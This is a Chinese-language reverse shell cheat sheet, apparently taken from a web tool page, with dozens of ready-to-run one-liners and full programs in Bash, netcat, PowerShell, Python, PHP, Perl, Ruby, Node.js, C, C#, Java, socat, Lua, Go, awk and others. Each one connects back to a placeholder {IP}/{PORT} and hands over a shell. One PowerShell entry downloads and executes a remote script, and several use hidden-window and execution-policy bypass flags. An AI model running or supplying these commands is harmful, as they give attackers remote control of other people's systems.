Reverse Shell Cheatsheet
精选 70+ 条原生反向 Shell 命令，涵盖 Bash、Netcat、PowerShell、Python、PHP 等多种语言与工具。
Bash 反弹 Shell
经典 Bash 反弹 (最常用)
bash -i >& /dev/tcp/{IP}/{PORT} 0>&1 Bash 196 文件描述符
0<&196;exec 196<>/dev/tcp/{IP}/{PORT}; bash <&196 >&196 2>&196 Bash read line 循环
exec 5<>/dev/tcp/{IP}/{PORT};cat <&5 | while read line; do $line 2>&5 >&5; done Bash 5 文件描述符
bash -i 5<> /dev/tcp/{IP}/{PORT} 0<&5 1>&5 2>&5 Bash UDP 反弹
bash -i >& /dev/udp/{IP}/{PORT} 0>&1 Netcat 系列
nc mkfifo (无 -e 参数)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {IP} {PORT} >/tmp/f nc -e (Linux/Mac)
nc -e /bin/bash {IP} {PORT} nc.exe -e (Windows)
nc.exe -e cmd.exe {IP} {PORT} nc -c (部分版本)
nc -c /bin/bash {IP} {PORT} ncat (Linux/Mac)
ncat {IP} {PORT} -e /bin/bash ncat.exe (Windows)
ncat.exe {IP} {PORT} -e cmd.exe ncat UDP 反弹
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|ncat -u {IP} {PORT} >/tmp/f rustcat (现代化替代)
rcat {IP} {PORT} -r /bin/bash PowerShell (Windows)
PowerShell #1 (经典)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{IP}",{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() PowerShell #2 (紧凑)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{IP}',{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" PowerShell #3 (StreamWriter)
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{IP}', {PORT});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" Windows ConPty (伪终端)
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {IP} {PORT} Python 反弹 Shell
Python #1 (伪终端)
export RHOST="{IP}";export RPORT={PORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")' Python #2 (紧凑)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' Python3 #1 (伪终端)
export RHOST="{IP}";export RPORT={PORT};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")' Python3 #2 (紧凑)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' Python3 最短版本
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{IP}",{PORT}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' PHP 反弹 Shell
PHP exec (单行)
php -r '$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");' PHP shell_exec
php -r '$sock=fsockopen("{IP}",{PORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");' PHP system
php -r '$sock=fsockopen("{IP}",{PORT});system("/bin/sh -i <&3 >&3 2>&3");' PHP passthru
php -r '$sock=fsockopen("{IP}",{PORT});passthru("/bin/sh -i <&3 >&3 2>&3");' PHP 反引号执行
php -r '$sock=fsockopen("{IP}",{PORT});`/bin/sh -i <&3 >&3 2>&3`;' PHP popen
php -r '$sock=fsockopen("{IP}",{PORT});popen("/bin/sh -i <&3 >&3 2>&3", "r");' PHP proc_open
php -r '$sock=fsockopen("{IP}",{PORT});$proc=proc_open("/bin/sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' Perl 反弹 Shell
Perl (经典)
perl -e 'use Socket;$i="{IP}";$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Perl no sh (无 shell 依赖)
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{IP}:{PORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' Ruby 反弹 Shell
Ruby #1 (经典)
ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{IP}",{PORT}))' Ruby no sh (交互式)
ruby -rsocket -e'exit if fork;c=TCPSocket.new("{IP}","{PORT}");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}' Node.js 反弹 Shell
Node.js #1 (调用 nc)
require('child_process').exec('nc -e /bin/bash {IP} {PORT}') Node.js #2 (原生管道)
(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/bash", []);var client = new net.Socket();client.connect({PORT}, "{IP}", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})(); C / C# 反弹 Shell
C Linux/Mac (完整代码)
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = {PORT};
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("{IP}");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
return 0;
} C# Windows (完整代码)
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack {
public class Program {
static StreamWriter streamWriter;
public static void Main(string[] args) {
using(TcpClient client = new TcpClient("{IP}", {PORT})) {
using(Stream stream = client.GetStream()) {
using(StreamReader rdr = new StreamReader(stream)) {
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
}
} Java 反弹 Shell
Java #1 (Runtime.exec)
public class shell {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/{IP}/{PORT} 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
} Java #2 (ProcessBuilder)
public class shell {
public static void main(String[] args) {
ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/{IP}/{PORT} 0>&1")
.redirectErrorStream(true);
try {
Process p = pb.start();
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
} Java #3 (Socket 双向通信)
import java.io.*;
import java.net.*;
public class shell {
public static void main(String[] args) {
String host = "{IP}";
int port = {PORT};
String cmd = "/bin/bash";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush(); po.flush();
Thread.sleep(50);
try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();
} catch (Exception e) {}
}
} 其他工具类
socat #1 (基础)
socat TCP:{IP}:{PORT} EXEC:/bin/bash socat #2 (TTY 伪终端)
socat TCP:{IP}:{PORT} EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane telnet 反弹
TF=$(mktemp -u);mkfifo $TF && telnet {IP} {PORT} 0<$TF | /bin/bash 1>$TF zsh 反弹
zsh -c 'zmodload zsh/net/tcp && ztcp {IP} {PORT} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' Lua #1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('{IP}','{PORT}');os.execute('/bin/bash -i <&3 >&3 2>&3');" Golang (编译运行)
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{IP}:{PORT}");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go Awk 反弹
awk 'BEGIN {s = "/inet/tcp/0/{IP}/{PORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null Zsh (Python 中转)
export RHOST="{IP}";export RPORT={PORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("zsh")' 未找到相关命令